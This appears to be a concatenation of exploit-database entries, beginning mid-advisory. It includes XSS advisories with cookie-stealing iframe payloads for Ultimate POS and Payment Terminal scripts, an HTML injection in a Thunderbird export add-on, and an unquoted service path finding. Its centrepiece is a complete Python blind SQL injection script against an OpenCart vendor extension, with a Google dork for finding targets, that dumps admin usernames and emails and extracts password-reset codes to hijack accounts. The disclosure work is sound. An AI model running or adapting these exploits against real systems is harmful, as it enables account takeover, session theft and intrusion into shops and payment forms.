khvdjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D; Max-Age=7200; path=/; httponly
---- PoC Session Logs (POST) [Edit] ---
https://pos-uf.localhost.com:8000/products/23
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------407073296625600179063246902867
Content-Length: 4064
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/23/edit
Cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmNmIwYzljMTBmZGUwNzE0In0%3D
_method=PUT&_token=null&name=test_products"><iframe src=evol.source onload=alert(document.cookie)></iframe>&sku=2&barcode_type=C128&unit_id=1&brand_id=&category_id=&sub_category_id=&product_locations[]=1&enable_stock=1&alert_quantity=2.00&product_description=&image=&product_brochure=&weight=4&product_custom_field1=3&product_custom_field2=5&product_custom_field3=1&product_custom_field4=2
&woocommerce_disable_sync=0&tax=&tax_type=exclusive&single_variation_id=204&single_dpp=1.00&single_dpp_inc_tax=1.00
&profit_percent=0.00&single_dsp=1.00&single_dsp_inc_tax=1.00&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000/products
set-cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmN
mIwYzljMTBmZGUwNzE0In0%3D; Max-Age=7200; path=/; httponly
Vulnerable Source: Products (list - name)
<tbody><tr data-href="https://pos-uf.localhost.com:8000/products/view/158" role="row" class="odd"><td class="selectable_td">
<input type="checkbox" class="row-select" value="158"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/img/default.png" alt="Product image" class="product-thumbnail-small"></div></td>
<td><div class="btn-group"><button type="button" class="btn btn-info dropdown-toggle btn-xs" data-toggle="dropdown" aria-expanded="false">
Actions<span class="caret"></span><span class="sr-only">Toggle Dropdown</span></button><ul class="dropdown-menu dropdown-menu-left" role="menu"><li>
<a href="https://pos-uf.localhost.com:8000/labels/show?product_id=158" data-toggle="tooltip" title="Print Barcode/Label"><i class="fa fa-barcode">
</i> Labels</a></li><li><a href="https://pos-uf.localhost.com:8000/products/view/158" class="view-product"><i class="fa fa-eye"></i> View</a></li>
<li><a href="https://pos-uf.localhost.com:8000/products/158/edit"><i class="glyphicon glyphicon-edit"></i> Edit</a></li><li>
<a href="https://pos-uf.localhost.com:8000/products/158" class="delete-product"><i class="fa fa-trash"></i> Delete</a></li><li class="divider">
</li><li><a href="#" data-href="https://pos-uf.localhost.com:8000/opening-stock/add/158" class="add-opening-stock"><i class="fa fa-database">
</i> Add or edit opening stock</a></li><li><a href="https://pos-uf.localhost.com:8000/products/stock-history/158"><i class="fas fa-history">
</i> Product stock history</a></li><li><a href="https://pos-uf.localhost.com:8000/products/create?d=158"><i class="fa fa-copy">
</i> Duplicate Product</a></li></ul></div></td><td class="sorting_1">aa"><iframe src="a" onload="alert(document.cookie)"></iframe>
<br><i class="fab fa-wordpress"></i></td><td>Awesome Shop</td><td><div style="white-space: nowrap;">$ 1.00 </div></td><td>
<div style="white-space: nowrap;">$ 1.25 </div></td><td> 0 Pieces</td><td>Single</td><td> </td><td></td><td></td><td>AS0158</td>
<td></td><td></td><td></td><td></td></tr><tr data-href="https://pos-uf.localhost.com:8000/products/view/17" role="row" class="even">
<td class="selectable_td"><input type="checkbox" class="row-select" value="17"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/uploads/img/1528727793_acerE15.jpg" alt="Product image" class="product-thumbnail-small"></div></td>
Reference(s):
https://pos-uf.localhost.com:8000/products/
https://pos-uf.localhost.com:8000/products/view/
https://pos-uf.localhost.com:8000/products/23/edit
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Restrict the input on product names to disallow special chars
2. Encode and filter the input transmitted via post in the name parameter
3. Escape and sanitize the output in the products listing of the backend
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: Opencart 3 Extension TMD Vendor System - Blind SQL Injection
# Author: Muhammad Zaki Sulistya (zaki.sulistya@gmail.com)
# Date: 03-11-2021
# Product: TMD Vendor System
# Vendor Homepage: https://www.opencartextensions.in/
# Software Link: https://www.opencartextensions.in/opencart-multi-vendor-multi-seller-marketplace
# Version: TMD Vendor System 3.x
# Tested on: MacOS
# Google Dork: inurl:index.php?route=vendor/allseller
# Info: Patched on the new version
#!/usr/bin/python
import requests
from bs4 import BeautifulSoup
from random import randint
import time
class TmdSqli:
def __init__(self, url):
self.char_list = ['.',':', '@', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
self.url = url
self.user_agents = []
self.set_user_agent()
self.is_vulnerable()
def set_user_agent(self):
if len(self.user_agents) == 0:
r = requests.get(
'https://gist.githubusercontent.com/pzb/b4b6f57144aea7827ae4/raw/cf847b76a142955b1410c8bcef3aabe221a63db1/user-agents.txt').text
self.user_agents = r.split("\n")
def get_content(self, url):
try:
n = randint(0, 999)
headers = {}
headers['user-agent'] = self.user_agents[n]
req = requests.get(url, headers=headers)
soup = BeautifulSoup(req.content, 'html.parser')
return soup.find(id='content')
except requests.exceptions.ConnectionError as e:
print("CONNECTION ERROR:", e)
time.sleep(60)
self.get_content(url)
def is_vulnerable(self):
url_injection_true = self.url + "' AND 1=1--+-"
url_injection_false = self.url + "' AND 1=0--+-"
default_response = self.get_content(self.url)
injection_true = self.get_content(url_injection_true)
injection_false = self.get_content(url_injection_false)
if (default_response == injection_true) and (default_response != injection_false):
print("The target is vulnerable")
self.injection_true = injection_true
row_length = self.user_data_length()
self.dump_data(row_length)
else:
print("Not vulnerable")
def user_data_length(self):
n = 1
while True:
request_url = self.url + "' AND (SELECT LENGTH(CONCAT(username,0x3a,email)) FROM oc_user LIMIT 0,1)=" + str(n) + "--+-"
req = self.get_content(request_url)
if req != self.injection_true:
n += 1
else:
print("Row length : " + str(n))
return n
break
def reset_code_length(self):
n = 1
while True:
request_url = self.url + "' AND (SELECT LENGTH(CONCAT(code)) FROM oc_user WHERE username = '" + self.username + "')=" + str(
n) + "--+-"
req = self.get_content(request_url)
if req != self.injection_true:
n += 1
else:
print("Row length : " + str(n))
return n
break
def dump_data(self, length):
data = ""
for i in range(1, length + 1):
for j in self.char_list:
j = ord(j)
request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(username,0x3a,email), " + str(i) + ",1)) FROM oc_user LIMIT 0,1)=" + str(j) + "--+-"
req = self.get_content(request_url)
if req == self.injection_true:
data += chr(j)
print("Get : " + data)
user_data = data.split(":")
self.username = user_data[0]
self.email = user_data[1]
self.reset_password()
def dump_reset_code(self, length):
data = ""
for i in range(1, length + 1):
for j in self.char_list:
j = ord(j)
request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(code), " + str(
i) + ",1)) FROM oc_user WHERE username = '" + self.username + "')=" + str(j) + "--+-"
req = self.get_content(request_url)
if req == self.injection_true:
data += chr(j)
print("Get : " + data)
return data
def reset_password(self):
self.admin_page = input("Admin page URL : ")
request_url = self.admin_page + '/index.php?route=common/forgotten'
post_data = {'email':self.email}
req = requests.post(request_url, data=post_data)
if req.status_code == 200:
row_length = self.reset_code_length()
reset_code = self.dump_reset_code(row_length)
reset_password_url = self.admin_page + '/index.php?route=common/reset&code=' + reset_code
print("Gotcha!")
print("username : " + self.username)
print("You can reset the password : " + reset_password_url)
print("TARGET URL ex: https://[redacted]]/index.php?route=product/product&product_id=[product_id]")
target = input("Target URL : ")
TmdSqli(target)
# Exploit Title: Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-11-05
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.criticalgears.com/
# Software Link: https://www.criticalgears.com/product/authorize-net-payment-terminal/ ) https://www.criticalgears.com/product/paypal-pro-payment-terminal/ ) https://www.criticalgears.com/product/stripe-payment-terminal/ )
# Version: 2.4.1, 2.2.1 & 3.1
# Tested on: Linux (Apache)
Document Title:
===============
Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2280
Release Date:
=============
2021-11-05
Vulnerability Laboratory ID (VL-ID):
====================================
2280
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Quick and easy payment terminal as script for clients to pay for products and services.
(Copy of the Homepage:https://www.criticalgears.com/product/authorize-net-payment-terminal/ )
(Copy of the Homepage:https://www.criticalgears.com/product/paypal-pro-payment-terminal/ )
(Copy of the Homepage:https://www.criticalgears.com/product/stripe-payment-terminal/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Authorize.net Payment Terminal v2.4.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Stripe Payment Terminal v2.2.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the PayPal PRO Payment Terminal v3.1.
Affected Product(s):
====================
CriticalGears
Product: Authorize.net Payment Terminal 2.4.1 - Payment Formular Script (PHP) (Web-Application)
Product: Stripe Payment Terminal v2.2.1 - Payment Formular Script (PHP) (Web-Application)
Product: PayPal PRO Payment Terminal v3.1 - Payment Formular Script (PHP) (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple non-persistent cross site scripting web vulnerabilities has been discovered in the official Authorize.net Payment Terminal v2.4.1,
the PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1. The vulnerability allows remote attackers to inject own malicious
script codes with non-persistent attack vector to compromise client-site browser to web-application requests.
The non-persistent cross site scripting web vulnerabilities are located in the `item_description`,`fname`,`lname`,`address`,`city`,`email`
parameters of the `Billing Information` or `Payment Information` formular. Attackers are able to inject own malicious script code to the
`Description`,`Firstname`, `Lastname`,`Address`,`City`,`Email` input fields to manipulate client-side requests. The request method to
inject is post and the attack vector is non-persistent on client-side. In case the form is implemented to another web-service attackers
are able to exploit the bug by triggering an execute of the script code in the invalid exception-handling.
The PayPal PRO Payment Terminal v3.1 and Stripe Payment Terminal v2.2.1 impacts the same vulnerable script and is affected as well by
the simple validation vulnerability.
Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external
redirects to malicious source and non-persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Billing Information
[+] Payment Information
Vulnerable Input(s):
[+] Description
[+] Firstname
[+] Lastname
[+] Address
[+] City
[+] Email
Vulnerable Parameter(s):
[+] item_description
[+] fname
[+] lname
[+] address
[+] city
[+] email
Affected Module(s):
[+] Exception Handling (Invalid)
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
">%20<iframe src=evil.source onload=alert(document.domain)>%20</iframe>
">%20<iframe src=evil.source onload=alert(document.cookie)>%20</iframe>
Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack)
<div id="accordion">
<!-- PAYMENT BLOCK -->
<h2 class="current">Payment Information</h2>
<div class="pane" style="display:block">
<label>Description:</label>
<input name="item_description" id="item_description" type="text" class="long-field" value="">
<iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);"
<div class="clr"></div>
<label>Amount:</label>
<input name="amount" id="amount" type="text" class="small-field" value="1.00" onkeyup="checkFieldBack(this);noAlpha(this);" onkeypress="noAlpha(this);">
<div class="clr"></div>
</div>
<!-- PAYMENT BLOCK -->
-
<!-- BILLING BLOCK -->
<h2>Billing Information</h2>
<div class="pane">
<label>First Name:</label>
<input name="fname" id="fname" type="text" class="long-field" value="">"><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>Last Name:</label>
<input name="lname" id="lname" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>Address:</label>
<input name="address" id="address" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>City:</label>
<input name="city" id="city" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
--- PoC Session Logs (POST) ---
https://autherminal.localhost:8080/authorize-terminal/
Host: autherminal.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------317816260230756398612099882125
Content-Length: 3270
Origin:https://autherminal.localhost:8080
Connection: keep-alive
Referer:https://autherminal.localhost:8080/authorize-terminal/
Cookie: PHPSESSID=952c12ca44f97e3b4056b731c7455a7c
item_description="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&amount=1&fname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&lname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&address="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&city="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&country=US&state=-AU-NSW&zip=2411
&email="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&cctype=V&ccn=4111111111111&ccname=test&exp1=11&exp2=2022&cvv=123
&g-recaptcha-response=03AGdBq26Aocx9i3nRxaDSsQIyF0Avo9p1ozb5407foq4ywp7IEY1Y-q9g14tFgwjjkNItQMhnF
&submit.x=50&submit.y=14&process=yes
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=utf-8
vary: Accept-Encoding
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the input in combination with a parse or escape of the content.
After that the onkeyup checkFieldBack should be sanitized correctly to prevent script code executions for clients.
Security Risk:
==============
The security risk of the client-side cross site scripting vulnerability in the web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 04-11-2021
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Tested Version: 9.31
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
srvInventoryWebServer srvInventoryWebServer C:\Program Files
(x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
Auto
C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: srvInventoryWebServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\10-Strike Network
Inventory Explorer Pro\InventoryWebServer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : srvInventoryWebServer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: ImportExportTools NG 10.0.4 - HTML Injection
# Date: 2021-11-05
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://github.com/thundernest/import-export-tools-ng
# Software Link: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/
# Version: 10.0.4
# Tested on: Windows
Document Title:
===============
ImportExportTools NG 10.0.4 - HTML Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2308
Release Date:
=============
2021-11-05
Vulnerability Laboratory ID (VL-ID):
====================================
2308
Common Vulnerability Scoring System:
====================================
4.2
Vulnerability Class:
====================
Script Code Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Adds tools to import/export messages and folders (NextGen).
(Copy of the Homepage:https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the official ImportExportTools NG 10.0.4 for mozilla thunderbird.
Affected Product(s):
====================
Christopher Leidigh
Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird)
Vulnerability Disclosure Timeline:
==================================
2021-10-07: Researcher Notification & Coordination (Security Researcher)
2021-10-08: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A html inject web vulnerability has been discovered in the official ImportExportTools NG 10.0.4 for mozilla thunderbird.
The vulnerability allows a remote attacker to inject html payloads to compromise application data or session credentials.
The vulnerability is located in the html export function. Subject content on export is not sanitized like on exports in mozilla itself.
Thus allows a remote attacker to send malicious emails with malformed a html payloads that executes on preview after a html export by
the victim user.
Vulnerable Module(s):
[+] Export (HTML)
Proof of Concept (PoC):
=======================
The web vulnerability can be exploited by remote attackers without user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install mozilla thunderbird
2. Install ImportExportTools NG v10.0.4
3. Use another email to write to the target inbox were the export takes place
Note: Inject into the subject any html test payload
4. Target user exports his content of the inbox in html were the payload executes
5. Successful reproduce of the encode validation vulnerability!
Note: We reported some years ago the same issue that was also present in keepass and kaspersky password manager on exports via html and has been successfully resolved.
Vulnerable Source: ImportExportTools Exported HTML File
<html><head>
<style>
table { border-collapse: collapse; }
th { background-color: #e6ffff; }
th, td { padding: 4px; text-align: left; vertical-align: center; }
tr:nth-child(even) { background-color: #f0f0f0; }
tr:nth-child(odd) { background-color: #fff; }
tr>:nth-child(5) { text-align: center; }
</style>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Posteingang</title>
</head>
<body>
<h2>Posteingang (10/07/2021)</h2><table width="99%" border="1"><tbody><tr><th><b>Betreff</b></th>
<th><b>Von</b></th><th><b>An</b></th><th><b>Datum</b></th><th><b>Anhang</b></th></tr>
<tr><td><a href="Nachrichten/20211007-payload%20in%20subject%20___iframe%20src%3Devil.source%20onload%3Dalert(document.domain)_-151.html">
payload in subject "><iframe src="evil.source" onlo<="" a=""></td>
<td>test@vulnerability-lab.com" <test@vulnerability-</td>
<td>user@test-service.de</td>
<td nowrap>10/07/2021</td>
<td align="center">* </td></tr>
Reference(s):
https://addons.thunderbird.net/de/thunderbird/addon/importexporttools-ng/
Solution - Fix & Patch:
=======================
The output that is visible in the subject needs to be encoded and secure sanitized to prevent an execute from any listed value.
Restrict the execution via import/export with special chars to prevent further attacks.
Credits & Authors:
==================
Vulnerability-Lab [admin@vulnerability-lab.com] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE